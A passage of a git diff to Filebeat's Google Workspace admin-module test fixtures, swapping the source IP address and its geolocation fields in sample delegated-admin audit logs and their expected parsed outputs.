         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log
index da76df3f7673..9de35080e1c7 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json
index 608736f71670..6c8c2c780f63 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -25,24 +25,20 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -66,7 +62,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -79,26 +75,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 483,
+        "log.offset": 482,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -119,7 +111,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -132,26 +124,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 912,
+        "log.offset": 910,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -172,7 +160,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -186,26 +174,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1341,
+        "log.offset": 1338,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -226,7 +210,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -240,26 +224,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1818,
+        "log.offset": 1814,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -280,7 +260,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -293,26 +273,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2298,
+        "log.offset": 2293,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -333,7 +309,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -346,26 +322,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2728,
+        "log.offset": 2722,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -386,7 +358,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
